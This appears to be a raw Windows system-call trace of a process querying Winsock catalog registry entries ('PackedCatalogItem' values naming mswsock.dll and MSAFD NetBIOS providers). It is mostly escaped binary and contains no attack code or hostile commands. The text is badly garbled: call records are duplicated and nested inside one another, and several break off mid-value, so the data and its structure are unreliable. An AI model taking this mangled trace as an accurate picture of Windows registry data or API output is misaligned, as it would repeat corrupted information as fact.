\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0H\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0I\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) \0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0H\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0I\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0 (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11\2\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\36\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\2\0\0\0\376\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0E\05\05\09\0B\00\0C\01\0-\0F\0A\04\06\0-\04\06\04\0D\0-\0B\0\0\0\0\0\204\3\0\0F\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0F\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0G\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\09\0G\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\0H\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0H\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0I\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) }, 900, ) == 0x0 02630 896 NtClose (220, ... ) == 0x0 02631 896 NtOpenKey (0x20019, {24, 216, 0x40, 0, 0, (0x20019, {24, 216, 0x40, 0, 0, "000000000019"}, ... 220, ) }, ... 220, ) == 0x0 02632 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW 02633 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW 02634 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\16\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\37\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\5\0\0\0\372\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0C\0D\03\0C\06\04\0B\08\0-\0D\0B\07\06\0-\04\04\0C\08\0-\09\0\0\0\0\0\204\3\0\0K\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0K\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0L\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\02\00\0L\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\0M\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0M\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0N\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) , Partial, 900, ... TitleIdx=0, Type=3, Data= (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\16\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\37\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\5\0\0\0\372\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0C\0D\03\0C\06\04\0B\08\0-\0D\0B\07\06\0-\04\04\0C\08\0-\09\0\0\0\0\0\204\3\0\0K\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0K\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0L\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\02\00\0L\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\0M\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0M\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0N\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) \0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0M\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0N\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0 (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\16\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\37\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\5\0\0\0\372\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0C\0D\03\0C\06\04\0B\08\0-\0D\0B\07\06\0-\04\04\0C\08\0-\09\0\0\0\0\0\204\3\0\0K\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0K\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0L\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\02\00\0L\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\0M\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0M\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0N\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) }, 900, ) == 0x0 02635 896 NtClose (220, ... ) == 0x0 02636 896 NtOpenKey (0x20019, {24, 216, 0x40, 0, 0, (0x20019, {24, 216, 0x40, 0, 0, "000000000020"}, ... 220, ) }, ... 220, ) == 0x0 02637 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW 02638 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW 02639 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11\2\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222 \4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\2\0\0\0\372\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0C\0D\03\0C\06\04\0B\08\0-\0D\0B\07\06\0-\04\04\0C\08\0-\09\0\0\0\0\0\204\3\0\0P\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0P\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0Q\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\02\01\0Q\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\0R\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0R\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0S\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) , Partial, 900, ... TitleIdx=0, Type=3, Data= (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11\2\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222 \4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\2\0\0\0\372\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0C\0D\03\0C\06\04\0B\08\0-\0D\0B\07\06\0-\04\04\0C\08\0-\09\0\0\0\0\0\204\3\0\0P\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0P\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0Q\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\02\01\0Q\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\0R\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0R\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0S\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) \0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0R\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0S\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0 (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11\2\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222 \4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\2\0\0\0\372\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0C\0D\03\0C\06\04\0B\08\0-\0D\0B\07\06\0-\04\04\0C\08\0-\09\0\0\0\0\0\204\3\0\0P\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0P\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0Q\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\02\01\0Q\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\0R\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0R\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0S\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) }, 900, ) == 0x0 02640 896 NtClose (220, ... ) == 0x0 02641 896 NtOpenKey (0x20019, {24, 216, 0x40, 0, 0, (0x20019, {24, 216, 0x40, 0, 0, "000000000021"}, ... 220, ) }, ... 220, ) == 0x0 02642 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW 02643 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW 02644 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\16\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222!\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\5\0\0\0\371\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\02\01\0B\08\0E\09\0D\05\0-\03\0F\0C\03\0-\04\0F\09\0D\0-\08\0\0\0\0\0\204\3\0\0U\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0U\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0V\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\02\02\0V\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\0W\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0W\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0X\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) , Partial, 900, ... TitleIdx=0, Type=3, Data= (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\16\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222!\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\5\0\0\0\371\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 